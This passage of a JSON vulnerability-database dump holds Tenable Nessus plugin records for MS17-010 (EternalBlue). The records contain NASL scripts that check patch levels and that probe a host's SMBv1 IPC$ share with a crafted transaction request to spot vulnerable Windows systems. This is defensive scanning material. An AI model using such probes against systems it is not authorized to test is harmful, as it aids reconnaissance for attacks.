file:\"srv.sys\", version:\"6.0.6002.19743\", min_version:\"6.0.6002.18000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"srv.sys\", version:\"6.0.6002.24067\", min_version:\"6.0.6002.20000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\") ||\n\n # Windows 7 / Windows Server 2008 R2\n smb_check_rollup(os:\"6.1\", sp:1, rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012212, 4012215)) ||\n\n # Windows Server 2012\n (\n \"Windows 8\" >!< productname\n &&\n smb_check_rollup(os:\"6.2\", sp:0, rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012214, 4012217))\n ) ||\n\n # Windows 8.1 / Windows Server 2012 R2\n smb_check_rollup(os:\"6.3\", sp:0, 
rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012213, 4012216)) ||\n\n # Windows 10\n smb_check_rollup(os:\"10\", sp:0, os_build:\"10240\", rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012606)) ||\n\n # Windows 10 1511\n smb_check_rollup(os:\"10\", sp:0, os_build:\"10586\", rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4013198)) ||\n\n # Windows 10 1607 / Windows Server 2016\n smb_check_rollup(os:\"10\", sp:0, os_build:\"14393\", rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4013429))\n)\n{\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "naslFamily": "Windows : Microsoft Bulletins", "cpe": ["cpe:/o:microsoft:windows"], "solution": "Microsoft has released a set of patches for Windows Vista, 2008, 7, 2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. 
Microsoft has also released emergency patches for Windows operating systems that are no longer supported, including Windows XP, 2003, and 8.", "nessusSeverity": "High", "cvssScoreSource": "CVE-2017-0148", "vpr": {"risk factor": "Critical", "score": "9.9"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2017-03-14T00:00:00", "vulnerabilityPublicationDate": "2017-03-14T00:00:00", "exploitableWith": ["Core Impact", "CANVAS(CANVAS)", "Metasploit(MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption)"], "_object_type": "robots.models.nessus.NessusBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.nessus.NessusBulletin"]}, {"id": "MS17-010.NASL", "hash": "59a3f59c439bc2d52437908b8868f320", "type": "nessus", "bulletinFamily": "scanner", "title": "MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya) (uncredentialed check)", "description": "The remote Windows host is affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of certain requests. An unauthenticated, remote attacker can exploit these vulnerabilities, via a specially crafted packet, to execute arbitrary code. (CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are four of multiple Equation Group vulnerabilities and exploits disclosed on 2017/04/14 by a group known as the Shadow Brokers. 
WannaCry / WannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit, and EternalRocks is a worm that utilizes seven Equation Group vulnerabilities. Petya is a ransomware program that first utilizes CVE-2017-0199, a vulnerability in Microsoft Office, and then spreads via ETERNALBLUE.", "published": "2017-03-20T00:00:00", "modified": "2020-10-15T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/97833", "reporter": "This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "http://www.nessus.org/u?4c7e0cf3", "http://www.nessus.org/u?d9f569cf", "https://github.com/stamparm/EternalRocks/", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146", "http://www.nessus.org/u?321523eb", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "http://www.nessus.org/u?68fc8eff", "http://www.nessus.org/u?b9d9ebf9", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "http://www.nessus.org/u?234f8ef8", "http://www.nessus.org/u?59db5b5b", "http://www.nessus.org/u?065561d0", "http://www.nessus.org/u?8dcab5e4", "https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/"], "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-10-22T13:00:41", "history": [{"bulletin": {"id": "MS17-010.NASL", "hash": "317afbf7b0f330e7e13446268469ccc00e586e8ef1083ae12a3ee45af28d8fa6", "type": "nessus", "bulletinFamily": "scanner", "title": "MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) 
(ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya) (uncredentialed check)", "description": "The remote Windows host is affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of certain requests. An unauthenticated, remote attacker can exploit these vulnerabilities, via a specially crafted packet, to execute arbitrary code. (CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are four of multiple Equation Group vulnerabilities and exploits disclosed on 2017/04/14 by a group known as the Shadow Brokers. WannaCry / WannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit, and EternalRocks is a worm that utilizes seven Equation Group vulnerabilities. 
Petya is a ransomware program that first utilizes CVE-2017-0199, a vulnerability in Microsoft Office, and then spreads via ETERNALBLUE.", "published": "2017-03-20T00:00:00", "modified": "2017-09-07T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "cvss2": {}, "cvss3": {}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=97833", "reporter": "Tenable", "references": ["http://www.nessus.org/u?8dcab5e4", "http://www.nessus.org/u?4c7e0cf3", "http://www.nessus.org/u?321523eb", "http://www.nessus.org/u?d9f569cf", "https://support.microsoft.com/en-us/kb/2696547", "https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/", "https://github.com/stamparm/EternalRocks/", "http://www.nessus.org/u?36fd3072", "http://www.nessus.org/u?7bec1941", "https://technet.microsoft.com/library/security/MS17-010", "http://www.nessus.org/u?59db5b5b"], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2017-09-08T00:21:41", "history": [], "viewCount": 4619, "enchantments": {}, "objectVersion": "1.6", "pluginID": "97833", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97833);\n script_version(\"$Revision: 1.14 $\");\n script_cvs_date(\"$Date: 2017/09/07 13:23:19 $\");\n\n script_cve_id(\n \"CVE-2017-0143\",\n \"CVE-2017-0144\",\n \"CVE-2017-0145\",\n \"CVE-2017-0146\",\n \"CVE-2017-0147\",\n \"CVE-2017-0148\"\n );\n script_bugtraq_id(\n 96703,\n 96704,\n 96705,\n 96706,\n 96707,\n 96709\n );\n script_osvdb_id(\n 153673,\n 153674,\n 153675,\n 153676,\n 153677,\n 153678,\n 155620,\n 155634,\n 155635\n );\n script_xref(name:\"EDB-ID\", value:\"41891\");\n script_xref(name:\"EDB-ID\", value:\"41987\");\n script_xref(name:\"MSFT\", value:\"MS17-010\");\n script_xref(name:\"IAVA\", value:\"2017-A-0065\");\n script_xref(name:\"MSKB\", 
value:\"4012212\");\n script_xref(name:\"MSKB\", value:\"4012213\");\n script_xref(name:\"MSKB\", value:\"4012214\");\n script_xref(name:\"MSKB\", value:\"4012215\");\n script_xref(name:\"MSKB\", value:\"4012216\");\n script_xref(name:\"MSKB\", value:\"4012217\");\n script_xref(name:\"MSKB\", value:\"4012606\");\n script_xref(name:\"MSKB\", value:\"4013198\");\n script_xref(name:\"MSKB\", value:\"4013429\");\n script_xref(name:\"MSKB\", value:\"4012598\");\n\n script_name(english:\"MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya) (uncredentialed check)\");\n script_summary(english:\"Checks the presence of MS17-010.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit these\n vulnerabilities, via a specially crafted packet, to\n execute arbitrary code. (CVE-2017-0143, CVE-2017-0144,\n CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted packet, to disclose sensitive\n information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are\nfour of multiple Equation Group vulnerabilities and exploits disclosed\non 2017/04/14 by a group known as the Shadow Brokers. 
WannaCry /\nWannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit,\nand EternalRocks is a worm that utilizes seven Equation Group\nvulnerabilities. Petya is a ransomware program that first utilizes\nCVE-2017-0199, a vulnerability in Microsoft Office, and then spreads\nvia ETERNALBLUE.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://technet.microsoft.com/library/security/MS17-010\");\n # https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?321523eb\");\n # https://blogs.technet.microsoft.com/mmpc/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7bec1941\");\n # https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d9f569cf\");\n script_set_attribute(attribute:\"see_also\", value:\"https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/kb/2696547\");\n # https://www.us-cert.gov/ncas/current-activity/2017/01/16/SMB-Security-Best-Practices\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8dcab5e4\");\n # http://www.theregister.co.uk/2017/01/18/uscert_warns_admins_to_kill_smb_after_shadow_brokers_dump/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?36fd3072\");\n # https://www.riskbasedsecurity.com/2016/08/the-shadow-brokers-lifting-the-shadows-of-the-nsas-equation-group/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4c7e0cf3\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/stamparm/EternalRocks/\");\n # 
https://www.tenable.com/blog/petyanotpetya-ransomware-detection-for-the-modern-enterprise\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?59db5b5b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows Vista, 2008, 7,\n2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. Microsoft has also\nreleased emergency patches for Windows operating systems that are no\nlonger supported, including Windows XP, 2003, and 8.\n\nFor unsupported Windows operating systems, e.g. Windows XP, Microsoft\nrecommends that users discontinue the use of SMBv1. SMBv1 lacks\nsecurity features that were included in later SMB versions. SMBv1 can\nbe disabled by following the vendor instructions provided in Microsoft\nKB2696547. Additionally, US-CERT recommends that users block SMB\ndirectly by blocking TCP port 445 on all network boundary devices. For\nSMB over the NetBIOS API, block TCP ports 137 / 139 and UDP ports 137\n/ 138 on all network boundary devices.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:U/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:U/RC:X\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"patch_publication_date\", 
value:\"2017/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2017 Tenable Network Security, Inc.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"smb_v1_enabled_remote.nasl\");\n script_require_keys(\"Host/OS\", \"SMB/SMBv1_is_supported\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"byte_func.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"smb_func.inc\");\n\nfunction smb_get_error_code (data)\n{\n local_var header, flags2, code;\n\n # Some checks in the header first\n header = get_smb_header (smbblob:data);\n if (!header)\n return NULL;\n\n flags2 = get_header_flags2 (header:header);\n if (flags2 & SMB_FLAGS2_32BIT_STATUS)\n {\n code = get_header_nt_error_code (header:header);\n }\n else\n {\n code = get_header_dos_error_code (header:header);\n }\n\n return code;\n}\n\n\nfunction my_smb_trans_and_x (setup, transname, param, data, max_pcount, max_dcount)\n{\n local_var header, parameters, dat, packet, ret, pad1, trans, p_offset, d_offset, plen, dlen, slen, pad2, npad;\n\n npad = pad1 = pad2 = NULL;\n\n if (session_is_unicode () == 1)\n trans = cstring (string:transname);\n else\n trans = transname;\n\n header = smb_header (Command: SMB_COM_TRANSACTION,\n Status: nt_status (Status: STATUS_SUCCESS));\n\n p_offset = 32 + 1 + 28 + strlen(setup) + 2 + strlen(trans);\n\n # Unicode transname should be aligned to 2 byte \n if(session_is_unicode() == 1)\n {\n npad = crap(data:'\\x00', length: (2 - p_offset 
% 2) % 2);\n p_offset += strlen(npad);\n }\n\n # Parameter is aligned to 4 byte\n pad1 = crap(data:'\\x00', length: (4 - p_offset % 4) % 4);\n p_offset += strlen(pad1);\n\n # Data is aligned to 4 byte\n d_offset = p_offset + strlen (param);\n pad2 = crap(data:'\\x00', length: (4 - d_offset % 4) % 4);\n d_offset += strlen(pad2);\n\n plen = strlen(param);\n dlen = strlen(data);\n slen = strlen(setup);\n\n if(isnull(max_pcount)) max_pcount =0xffff;\n if(isnull(max_dcount)) max_dcount =0xffff;\n\n parameters = \n raw_word (w:plen) + # total parameter count\n\t raw_word (w:dlen) + # total data count\n\t raw_word (w:max_pcount) + # Max parameter count\n\t raw_word (w:max_dcount) + # Max data count\n\t raw_byte (b:0) + # Max setup count\n raw_byte (b:0) + # Reserved\n\t raw_word (w:0) + # Flags\n\t raw_dword (d:0) + # Timeout\n\t raw_word (w:0) + # Reserved\n\t raw_word (w:plen) + # Parameter count\n\t raw_word (w:p_offset) + # Parameter offset\n\t raw_word (w:dlen) + # Data count\n\t raw_word (w:d_offset) + # Data offset\n\t raw_byte (b:slen/2) + # Setup count\n\t raw_byte (b:0); # Reserved\n\n parameters += setup;\n\n parameters = smb_parameters (data:parameters);\n\n dat = npad +\n trans +\n pad1 +\n param +\n pad2 +\n data;\n\n dat = smb_data (data:dat);\n\n packet = netbios_packet (header:header, parameters:parameters, data:dat);\n\n ret = smb_sendrecv (data:packet);\n if (!ret)\n return NULL;\n\n return smb_get_error_code (data:ret);\n}\n\n\n#\n# MAIN\n#\n\n# Make sure it's Windows \nos = get_kb_item_or_exit(\"Host/OS\");\nif (\"Windows\" >!< os)\n audit(AUDIT_HOST_NOT, \"Windows\"); \n \n# Make sure SMBv1 is enabled\nif (! 
get_kb_item(\"SMB/SMBv1_is_supported\"))\n exit(0, \"SMB version 1 does not appear to be enabled on the remote host.\"); \n\nif (!smb_session_init(smb2:FALSE)) audit(AUDIT_FN_FAIL, 'smb_session_init');\n\nr = NetUseAdd(share:\"IPC$\");\nif (r != 1)\n{\n exit(1, 'Failed to connect to the IPC$ share anonymously.');\n}\n\nfid = 0; # Invalid FID \nsetup = raw_word (w:0x23) + raw_word (w:fid); \n\nstatus = my_smb_trans_and_x (setup: setup, transname:\"\\PIPE\\\");\nNetUseDel();\n\nif(! isnull(status))\n{\n if(status == STATUS_INVALID_HANDLE\n || status == STATUS_ACCESS_DENIED # Win 10\n )\n {\n audit(AUDIT_HOST_NOT , \"affected\"); \n }\n else if (status == STATUS_INSUFF_SERVER_RESOURCES)\n {\n port = kb_smb_transport();\n security_report_v4(port: port, severity: SECURITY_HOLE);\n }\n else\n {\n status = \"0x\" + toupper(hexstr(mkdword(status)));\n audit(AUDIT_RESP_BAD, port, \"an SMB_COM_TRANSACTION request. Status code: \" + status);\n }\n}\nelse\n{\n exit(1, \"Failed to get response status for an SMB_COM_TRANSACTION request.\"); \n}\n", "naslFamily": "Windows", "cpe": [], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2017-09-08T00:21:41", "differentElements": ["cpe", "modified", "references", "sourceData"], "edition": 1}, {"bulletin": {"id": "MS17-010.NASL", "hash": "792da30901508b9874d87924fbdbd7ed4db95e94cb53976cfae9e6e1b709638c", "type": "nessus", "bulletinFamily": "scanner", "title": "MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya) (uncredentialed check)", "description": "The remote Windows host is affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling 
of certain requests. An unauthenticated, remote attacker can exploit these vulnerabilities, via a specially crafted packet, to execute arbitrary code. (CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are four of multiple Equation Group vulnerabilities and exploits disclosed on 2017/04/14 by a group known as the Shadow Brokers. WannaCry / WannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit, and EternalRocks is a worm that utilizes seven Equation Group vulnerabilities. Petya is a ransomware program that first utilizes CVE-2017-0199, a vulnerability in Microsoft Office, and then spreads via ETERNALBLUE.", "published": "2017-03-20T00:00:00", "modified": "2018-11-15T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "cvss2": {}, "cvss3": {}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=97833", "reporter": "Tenable", "references": ["http://www.nessus.org/u?8dcab5e4", "https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010", "http://www.nessus.org/u?4c7e0cf3", "http://www.nessus.org/u?321523eb", "http://www.nessus.org/u?d9f569cf", "http://www.nessus.org/u?234f8ef8", "https://support.microsoft.com/en-us/help/2696547/how-to-detect-enable-and-disable-smbv1-smbv2-and-smbv3-in-windows-and", "https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/", "https://github.com/stamparm/EternalRocks/", "http://www.nessus.org/u?59db5b5b", "http://www.nessus.org/u?065561d0"], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", 
"CVE-2017-0145"], "immutableFields": [], "lastseen": "2018-11-17T03:13:38", "history": [], "viewCount": 5774, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.6", "pluginID": "97833", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97833);\n script_version(\"1.20\");\n script_cvs_date(\"Date: 2018/11/15 20:50:27\");\n\n script_cve_id(\n \"CVE-2017-0143\",\n \"CVE-2017-0144\",\n \"CVE-2017-0145\",\n \"CVE-2017-0146\",\n \"CVE-2017-0147\",\n \"CVE-2017-0148\"\n );\n script_bugtraq_id(\n 96703,\n 96704,\n 96705,\n 96706,\n 96707,\n 96709\n );\n script_xref(name:\"EDB-ID\", value:\"41891\");\n script_xref(name:\"EDB-ID\", value:\"41987\");\n script_xref(name:\"MSFT\", value:\"MS17-010\");\n script_xref(name:\"IAVA\", value:\"2017-A-0065\");\n script_xref(name:\"MSKB\", value:\"4012212\");\n script_xref(name:\"MSKB\", value:\"4012213\");\n script_xref(name:\"MSKB\", value:\"4012214\");\n script_xref(name:\"MSKB\", value:\"4012215\");\n script_xref(name:\"MSKB\", value:\"4012216\");\n script_xref(name:\"MSKB\", value:\"4012217\");\n script_xref(name:\"MSKB\", value:\"4012606\");\n script_xref(name:\"MSKB\", value:\"4013198\");\n script_xref(name:\"MSKB\", value:\"4013429\");\n script_xref(name:\"MSKB\", value:\"4012598\");\n\n script_name(english:\"MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya) (uncredentialed check)\");\n script_summary(english:\"Checks the presence of MS17-010.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Server Message Block 1.0 (SMBv1) due 
to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit these\n vulnerabilities, via a specially crafted packet, to\n execute arbitrary code. (CVE-2017-0143, CVE-2017-0144,\n CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted packet, to disclose sensitive\n information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are\nfour of multiple Equation Group vulnerabilities and exploits disclosed\non 2017/04/14 by a group known as the Shadow Brokers. WannaCry /\nWannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit,\nand EternalRocks is a worm that utilizes seven Equation Group\nvulnerabilities. Petya is a ransomware program that first utilizes\nCVE-2017-0199, a vulnerability in Microsoft Office, and then spreads\nvia ETERNALBLUE.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010\");\n # https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?321523eb\");\n # https://cloudblogs.microsoft.com/microsoftsecure/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/?source=mmpc\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?065561d0\");\n # https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d9f569cf\");\n script_set_attribute(attribute:\"see_also\", value:\"https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/\");\n script_set_attribute(attribute:\"see_also\", 
value:\"https://support.microsoft.com/en-us/help/2696547/how-to-detect-enable-and-disable-smbv1-smbv2-and-smbv3-in-windows-and\");\n # https://www.us-cert.gov/ncas/current-activity/2017/01/16/SMB-Security-Best-Practices\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8dcab5e4\");\n # https://www.theregister.co.uk/2017/01/18/uscert_warns_admins_to_kill_smb_after_shadow_brokers_dump/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?234f8ef8\");\n # https://www.riskbasedsecurity.com/2016/08/the-shadow-brokers-lifting-the-shadows-of-the-nsas-equation-group/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4c7e0cf3\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/stamparm/EternalRocks/\");\n # https://www.tenable.com/blog/petyanotpetya-ransomware-detection-for-the-modern-enterprise\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?59db5b5b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows Vista, 2008, 7,\n2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. Microsoft has also\nreleased emergency patches for Windows operating systems that are no\nlonger supported, including Windows XP, 2003, and 8.\n\nFor unsupported Windows operating systems, e.g. Windows XP, Microsoft\nrecommends that users discontinue the use of SMBv1. SMBv1 lacks\nsecurity features that were included in later SMB versions. SMBv1 can\nbe disabled by following the vendor instructions provided in Microsoft\nKB2696547. Additionally, US-CERT recommends that users block SMB\ndirectly by blocking TCP port 445 on all network boundary devices. 
For\nSMB over the NetBIOS API, block TCP ports 137 / 139 and UDP ports 137\n/ 138 on all network boundary devices.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"manual\");\n script_set_attribute(attribute:\"cvss_score_rationale\", value:\"score from a more in depth analysis done by Tenable.\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned 
